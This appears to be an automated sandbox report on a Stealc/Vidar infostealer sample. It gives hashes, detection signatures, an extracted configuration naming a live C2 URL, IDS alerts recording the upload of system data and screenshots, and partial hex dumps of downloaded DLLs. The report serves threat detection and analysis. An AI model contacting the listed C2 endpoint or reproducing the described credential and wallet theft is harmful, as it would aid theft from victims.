Windows Analysis Report
9JtNIXVedn.exe

Overview

General Information

Sample name:	9JtNIXVedn.exe renamed because original name is a hash value
Original sample name:	678f666b1f2e04b504d62430f8e95b64.exe
Analysis ID:	1543864
MD5:	678f666b1f2e04b504d62430f8e95b64
SHA1:	d8484b6da5c0faf9cb0453f12d34b3c60f03fc69
SHA256:	b32b753d94dc0a02f097626fa793432be53d5927d30abc5490a2d44a055670e5
Tags:	32exe
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

PE / OLE file has an invalid certificate

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Found malware configuration

Source: 9JtNIXVedn.exe.7776.0.memstrmin

Malware Configuration Extractor: StealC {"C2 url": "http://95.182.96.50/2aced82320799c96.php", "Botnet": "mainteam"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.3% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE1A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6CE1A9A0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE144C0 PK11_PubEncrypt,	0_2_6CE144C0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE14440 PK11_PrivDecrypt,	0_2_6CE14440
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDE4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6CDE4420
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE625B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6CE625B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDFE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	0_2_6CDFE6E0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDF8670 PK11_ExportEncryptedPrivKeyInfo,	0_2_6CDF8670
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE1A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	0_2_6CE1A650
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE3A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	0_2_6CE3A730
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE40180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	0_2_6CE40180
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE143B0 PK11_PubEncryptPKCS1,PR_SetError,	0_2_6CE143B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE37C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	0_2_6CE37C00
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CDF7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	0_2_6CDF7D60
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE3BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	0_2_6CE3BD30
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE39EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	0_2_6CE39EC0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	Code function: 0_2_6CE13FF0 PK11_PrivDecryptPKCS1,	0_2_6CE13FF0

Uses 32bit PE files

Source: 9JtNIXVedn.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 9JtNIXVedn.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: mozglue.pdbP source: 9JtNIXVedn.exe, 00000000.00000002.1691259038.000000006FF1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: 9JtNIXVedn.exe, 00000000.00000002.1690617293.000000006CEEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: 9JtNIXVedn.exe, 00000000.00000002.1691259038.000000006FF1D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\9JtNIXVedn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49711 -> 95.182.96.50:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.9:49711 -> 95.182.96.50:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 95.182.96.50:80 -> 192.168.2.9:49711
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.9:49711 -> 95.182.96.50:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.182.96.50:80 -> 192.168.2.9:49711
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.9:49711 -> 95.182.96.50:80
Source: Network traffic	Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.9:49711 -> 95.182.96.50:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://95.182.96.50/2aced82320799c96.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:32 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 28 Oct 2024 14:16:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 